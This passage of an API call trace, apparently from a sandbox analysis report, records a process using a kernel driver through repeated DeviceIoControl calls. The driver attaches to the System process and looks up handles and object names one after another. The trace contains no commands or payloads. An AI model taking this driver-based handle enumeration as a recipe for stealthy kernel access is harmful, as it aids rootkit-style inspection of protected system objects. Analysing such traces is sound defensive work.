ObQueryNameString (in: Object=0xfffffa8003a75d50, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.708] ObfDereferenceObject (Object=0xfffffa8003a75d50) returned 0x2 [0240.708] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.708] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.708] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.708] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0240.708] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.708] PsAcquireProcessExitSynchronization () returned 0x0 [0240.708] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.708] ObReferenceObjectByHandle (in: Handle=0xffffffff80000508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800382e210, HandleInformation=0x0) returned 0x0 [0240.708] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.708] PsReleaseProcessExitSynchronization () returned 0x2 [0240.708] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.708] ObQueryNameString (in: Object=0xfffffa800382e210, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.708] ObfDereferenceObject (Object=0xfffffa800382e210) returned 0x2 [0240.708] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.708] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.708] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.708] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.708] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.708] PsAcquireProcessExitSynchronization () returned 0x0 [0240.708] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.709] ObReferenceObjectByHandle (in: Handle=0xffffffff8000050c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a66850, HandleInformation=0x0) returned 0x0 [0240.709] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.709] PsReleaseProcessExitSynchronization () returned 0x2 [0240.709] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.709] ObQueryNameString (in: Object=0xfffffa8003a66850, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.709] ObfDereferenceObject (Object=0xfffffa8003a66850) returned 0x2 [0240.709] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.709] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.709] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.709] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.709] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.709] PsAcquireProcessExitSynchronization () returned 0x0 [0240.709] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.709] ObReferenceObjectByHandle (in: Handle=0xffffffff80000510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003809d20, HandleInformation=0x0) returned 0x0 [0240.709] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.709] PsReleaseProcessExitSynchronization () returned 0x2 [0240.709] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.709] ObQueryNameString (in: Object=0xfffffa8003809d20, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.709] ObfDereferenceObject (Object=0xfffffa8003809d20) returned 0x2 [0240.709] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.709] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.710] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.710] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.710] PsAcquireProcessExitSynchronization () returned 0x0 [0240.710] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.710] ObReferenceObjectByHandle (in: Handle=0xffffffff80000514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001967a30, HandleInformation=0x0) returned 0x0 [0240.710] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.710] PsReleaseProcessExitSynchronization () returned 0x2 [0240.710] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.710] ObQueryNameString (in: Object=0xfffffa8001967a30, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.710] ObfDereferenceObject (Object=0xfffffa8001967a30) returned 0x2 [0240.710] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.710] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.710] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.710] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.710] PsAcquireProcessExitSynchronization () returned 0x0 [0240.710] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.710] ObReferenceObjectByHandle (in: Handle=0xffffffff80000518, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037ccbd0, HandleInformation=0x0) returned 0x0 [0240.710] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.710] PsReleaseProcessExitSynchronization () returned 0x2 [0240.710] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.710] ObQueryNameString (in: Object=0xfffffa80037ccbd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.711] ObfDereferenceObject (Object=0xfffffa80037ccbd0) returned 0x2 [0240.711] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.711] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.711] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.711] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.711] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.711] PsAcquireProcessExitSynchronization () returned 0x0 [0240.711] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.711] ObReferenceObjectByHandle (in: Handle=0xffffffff8000051c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002af6f20, HandleInformation=0x0) returned 0x0 [0240.711] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.711] PsReleaseProcessExitSynchronization () returned 0x2 [0240.711] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.711] ObQueryNameString (in: Object=0xfffffa8002af6f20, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.711] ObfDereferenceObject (Object=0xfffffa8002af6f20) returned 0x2 [0240.711] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.711] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.711] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.711] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.711] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.711] PsAcquireProcessExitSynchronization () returned 0x0 [0240.711] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.712] ObReferenceObjectByHandle (in: Handle=0xffffffff80000520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8c1f0, HandleInformation=0x0) returned 0x0 [0240.712] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.712] PsReleaseProcessExitSynchronization () returned 0x2 [0240.712] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.712] ObQueryNameString (in: Object=0xfffffa8001e8c1f0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.712] ObfDereferenceObject (Object=0xfffffa8001e8c1f0) returned 0x2 [0240.712] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.712] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.712] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.712] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.712] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.712] PsAcquireProcessExitSynchronization () returned 0x0 [0240.712] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.712] ObReferenceObjectByHandle (in: Handle=0xffffffff80000524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a9d860, HandleInformation=0x0) returned 0x0 [0240.712] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.712] PsReleaseProcessExitSynchronization () returned 0x2 [0240.712] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.712] ObQueryNameString (in: Object=0xfffffa8003a9d860, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.712] ObfDereferenceObject (Object=0xfffffa8003a9d860) returned 0x2 [0240.712] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.712] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.712] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.712] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.713] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.713] PsAcquireProcessExitSynchronization () returned 0x0 [0240.713] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.713] ObReferenceObjectByHandle (in: Handle=0xffffffff80000528, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f7f2c0, HandleInformation=0x0) returned 0x0 [0240.713] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.713] PsReleaseProcessExitSynchronization () returned 0x2 [0240.713] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.713] ObQueryNameString (in: Object=0xfffffa8001f7f2c0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.713] ObfDereferenceObject (Object=0xfffffa8001f7f2c0) returned 0x2 [0240.713] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.713] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.713] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.713] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.713] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.713] PsAcquireProcessExitSynchronization () returned 0x0 [0240.713] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.713] ObReferenceObjectByHandle (in: Handle=0xffffffff8000052c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80118c43b0, HandleInformation=0x0) returned 0x0 [0240.713] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.713] PsReleaseProcessExitSynchronization () returned 0x2 [0240.713] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.714] ObQueryNameString (in: Object=0xfffffa80118c43b0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.714] ObfDereferenceObject (Object=0xfffffa80118c43b0) returned 0x2 [0240.714] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.714] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.714] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.714] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.714] PsAcquireProcessExitSynchronization () returned 0x0 [0240.714] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.714] ObReferenceObjectByHandle (in: Handle=0xffffffff80000530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8b8b0, HandleInformation=0x0) returned 0x0 [0240.714] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.714] PsReleaseProcessExitSynchronization () returned 0x2 [0240.714] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.714] ObQueryNameString (in: Object=0xfffffa8001e8b8b0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.714] ObfDereferenceObject (Object=0xfffffa8001e8b8b0) returned 0x2 [0240.714] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.714] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.714] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.714] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.714] PsAcquireProcessExitSynchronization () returned 0x0 [0240.714] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.715] ObReferenceObjectByHandle (in: Handle=0xffffffff80000534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800d1d46f0, HandleInformation=0x0) returned 0x0 [0240.715] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.715] PsReleaseProcessExitSynchronization () returned 0x2 [0240.715] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.715] ObQueryNameString (in: Object=0xfffffa800d1d46f0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.715] ObfDereferenceObject (Object=0xfffffa800d1d46f0) returned 0x2 [0240.715] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.715] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.715] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.715] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.715] PsAcquireProcessExitSynchronization () returned 0x0 [0240.715] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.715] ObReferenceObjectByHandle (in: Handle=0xffffffff80000538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8c050, HandleInformation=0x0) returned 0x0 [0240.715] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.715] PsReleaseProcessExitSynchronization () returned 0x2 [0240.715] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.715] ObQueryNameString (in: Object=0xfffffa8001e8c050, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.715] ObfDereferenceObject (Object=0xfffffa8001e8c050) returned 0x2 [0240.715] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.715] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.715] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.716] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.716] PsAcquireProcessExitSynchronization () returned 0x0 [0240.716] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.716] ObReferenceObjectByHandle (in: Handle=0xffffffff8000053c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034bd620, HandleInformation=0x0) returned 0x0 [0240.716] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.716] PsReleaseProcessExitSynchronization () returned 0x2 [0240.716] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.716] ObQueryNameString (in: Object=0xfffffa80034bd620, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.716] ObfDereferenceObject (Object=0xfffffa80034bd620) returned 0x2 [0240.716] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.716] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.716] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.716] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.716] PsAcquireProcessExitSynchronization () returned 0x0 [0240.716] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.716] ObReferenceObjectByHandle (in: Handle=0xffffffff80000540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8c680, HandleInformation=0x0) returned 0x0 [0240.716] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.716] PsReleaseProcessExitSynchronization () returned 0x2 [0240.716] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.716] ObQueryNameString (in: Object=0xfffffa8001e8c680, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.716] ObfDereferenceObject (Object=0xfffffa8001e8c680) returned 0x2 